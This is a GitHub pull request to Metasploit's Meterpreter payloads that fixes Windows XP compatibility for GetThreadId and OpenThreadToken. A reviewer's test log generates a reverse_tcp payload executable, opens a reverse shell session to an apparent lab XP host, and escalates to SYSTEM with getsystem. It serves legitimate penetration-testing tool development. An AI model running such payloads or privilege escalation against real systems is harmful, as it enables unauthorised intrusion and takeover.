Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

GetThreadId/OpenThreadToken not available in kernel32 in Windows XP sp2/sp3 with MingW #712

Merged
merged 5 commits into from
Sep 19, 2024
Merged

GetThreadId/OpenThreadToken not available in kernel32 in Windows XP sp2/sp3 with MingW #712

merged 5 commits into from
Sep 19, 2024

Conversation

wolfcod
Copy link
Contributor

@wolfcod wolfcod commented Aug 12, 2024
edited
Loading

This patch fixes two issues on Windows XP:

  1. GetThreadId not available on Windows XP sp2/sp3 (according to MSDN, it's present only from NT 5.2)
  2. OpenThreadToken is present in ADVAPI32.dll as API, but the same API is available in kernel32 in mingw-x86, which doesn't reflect the exported symbol of kernel32 on XP.

@wolfcod wolfcod changed the title Resolve GetThreadId at runtime GetThreadId/OpenThreadToken not available in kernel32 in Windows XP sp2/sp3 with MingW Aug 13, 2024
@wolfcod wolfcod mentioned this pull request Aug 13, 2024
Open
@dledda-r7 dledda-r7 self-assigned this Aug 14, 2024
@wolfcod wolfcod mentioned this pull request Aug 27, 2024
Merged
dledda-r7
dledda-r7 approved these changes Sep 18, 2024
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Changes looks good to me.

Before

┌──(kali㉿kali)-[~/…/metasploit-payloads/c/meterpreter/output]
└─$ r2 metsrv.x86.dll           
WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
[0x6ad013b0]> ii |grep ThreadToken
45  0x6ad264f8 NONE FUNC KERNEL32.dll OpenThreadToken
[0x6ad013b0]> 

msf6 payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] Sending stage (490769 bytes) to 172.20.133.167
[*] 172.20.133.167 - Meterpreter session 2 closed.  Reason: Died

After

┌──(kali㉿kali)-[~/…/metasploit-payloads/c/meterpreter/output]
└─$ r2 metsrv.x86.dll
WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
[0x6ad013b0]> ii |grep ThreadToken
17  0x6ad26428 NONE FUNC ADVAPI32.dll OpenThreadToken
[0x6ad013b0]> 

msf6 payload(windows/meterpreter/reverse_tcp) > generate -f exe -o ~/Documents/github/pr/712/shell.exe
[*] Writing 73802 bytes to ~/Documents/github/pr/712/shell.exe...
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 0
msf6 payload(windows/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 172.20.129.76:4444 
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (490769 bytes) to 172.20.133.167
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 1 opened (172.20.129.76:4444 -> 172.20.133.167:1045) at 2024-09-18 09:55:42 -0400

msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : USER-B1692D6A4F
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: USER-B1692D6A4F\User
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Thanks a lot @wolfcod for the PR!

@dledda-r7 dledda-r7 merged commit 3420144 into rapid7:master Sep 19, 2024
15 of 18 checks passed
zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Oct 10, 2024
@zeroSteiner
Update metasploit-payloads gem to 2.0.175
0309f51 
Includes changes from:
* rapid7/metasploit-payloads#719
* rapid7/metasploit-payloads#718
* rapid7/metasploit-payloads#715
* rapid7/metasploit-payloads#713
* rapid7/metasploit-payloads#712
* rapid7/metasploit-payloads#709
* rapid7/metasploit-payloads#708
* rapid7/metasploit-payloads#705
* rapid7/metasploit-payloads#704
* rapid7/metasploit-payloads#703
@zeroSteiner zeroSteiner mentioned this pull request Oct 10, 2024
Merged
zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Oct 10, 2024
@zeroSteiner
Update metasploit-payloads gem to 2.0.176
af43bd5 
Includes changes from:
* rapid7/metasploit-payloads#716
* rapid7/metasploit-payloads#719
* rapid7/metasploit-payloads#718
* rapid7/metasploit-payloads#715
* rapid7/metasploit-payloads#713
* rapid7/metasploit-payloads#712
* rapid7/metasploit-payloads#709
* rapid7/metasploit-payloads#708
* rapid7/metasploit-payloads#705
* rapid7/metasploit-payloads#704
* rapid7/metasploit-payloads#703
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
None yet
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@wolfcod @cdelafuente-r7 @dledda-r7